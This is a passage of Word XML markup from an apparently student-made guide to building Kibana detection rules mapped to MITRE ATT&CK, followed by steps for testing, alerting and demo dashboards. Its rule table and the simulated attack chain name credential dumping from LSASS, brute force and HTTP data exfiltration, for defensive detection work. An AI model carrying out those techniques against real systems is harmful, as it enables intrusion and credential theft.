            <w:r w:rsidRPr="00463952">
              <w:t>event.severity</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00463952">
              <w:t xml:space="preserve"> : "high"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57631B4B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saved Searches</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> from “Discover” to add panels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="101AF7D9" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="20C0499B">
          <v:rect id="_x0000_i1108" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A2ED03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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6.4 — Map Detections to MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="066B7A3D" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>In each rule, include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="643D2A3C" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tactic (e.g., Privilege Escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198A22DB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Technique ID (e.g., T1059.001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6367E3FA" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Make a summary table in your docs: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840"/>
        <w:gridCol w:w="2627"/>
        <w:gridCol w:w="1109"/>
      </w:tblGrid>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="37CB4C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1E568" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>MITRE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14EA9CBA" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952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78B4C2A" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Rule Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="05F58A67" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00463952">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Log Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="328842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AA52" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>T1059.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5ED3D511" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>PowerShell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7FA1DFBD" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Suspicious PowerShell Usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="00114B74" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>Winlogbeat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="7F15A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CA198" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>T1110</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3850125F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Brute Force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="72DD8B4B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Multiple SSH Failures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3835B2B5" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>Filebeat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="1411F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4843F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>T1041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="62C27160" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Data Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58845FE4" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Large HTTP POSTs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="695F9CDF" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Suricata</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="6429BA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6032" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>T1021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02562354" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D95F3BB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Unusual RDP/SSH Access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CB418D7" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>Winlogbeat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00463952" w:rsidRPr="00463952" w14:paraId="4B5851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AB4F8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>T1003</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A2D642F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>Credential Dumping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1A6953F7" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:r w:rsidRPr="00463952">
              <w:t>LSASS Process Dump</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55C6EBFE" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00463952">
              <w:t>Winlogbeat</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="162D415F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="0BD48286">
          <v:rect id="_x0000_i1109" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="61319FF1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⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6.5 — Testing and Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1D6DD" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Use your APT simulation from Step 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582CAEDB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Run a PowerShell or SSH brute force simulation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453CE7D7" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="75"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Check Kibana → Security → Alerts tab.</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>You should see a new alert triggered by your rule.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C970C9B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Validate precision/recall:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CB668E" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Count how many true vs false positives you get.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2A4407" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="76"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Adjust query filters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F80B6B4" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="729FFF88">
          <v:rect id="_x0000_i1110" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EE0277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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6.6 — Optional Enhancements</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E1585D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🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Alert Actions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0007A60E" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>You can configure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="407A1864" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Send email/slack webhook</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27067BBD" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="77"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Trigger webhook to incident response system</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
        <w:t>(Example placeholder for demo.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC5C6BF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🔸</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Timeline Investigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446652FF" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>Kibana “Timeline” lets you correlate multiple alerts → show APT chain like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248AD0AA" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>PowerShell Run → LSASS Dump → HTTP Exfiltration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C73BCEE" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="7F1AEEBA">
          <v:rect id="_x0000_i1111" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F23F8FC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💻</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6.7 — Create a Dashboard for Demo (judges love visuals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2213C593" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Suggested Panels for Demo:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8F4CC6" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚡</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> Live Alert Feed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738146DB" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>📊</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> Attack Type Distribution (by MITRE ID)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4188345F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🌍</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:t>GeoMap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> of source IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214E013F" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧑</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t>‍</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>💻</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> Top 10 Attackers (source IPs)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48929478" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🕒</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> Alerts over Time Graph</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A569D7B" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="78"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:t xml:space="preserve"> Technique Heatmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E44204" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:t>For an even better impression, add your logo and project name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC54E1E" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952" w:rsidP="00463952">
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“ELK-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>APTGuard</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>: Transformer-Based Threat Detection &amp; Response”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E52DDB7" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00000000" w:rsidP="00463952">
      <w:r>
        <w:pict w14:anchorId="47454C2F">
          <v:rect id="_x0000_i1112" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C10A965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📘</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6.8 — Helpful Resources</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363F6188" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Kibana Detections:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId58" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/security/current/prebuilt-rules.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="388D7014" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>MITRE ATT&amp;CK Navigator (reference tactics &amp; techniques):</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId59" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://attack.mitre.org/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="251188A8" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Kibana Dashboard creation:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId60" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/kibana/current/dashboard.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2CB46342" w14:textId="77777777" w:rsidR="00463952" w:rsidRPr="00463952" w:rsidRDefault="00463952">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="79"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00463952">
        <w:t>Rule query syntax:</w:t>
      </w:r>
      <w:r w:rsidRPr="00463952">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId61" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00463952">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/kibana/current/kuery-query.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
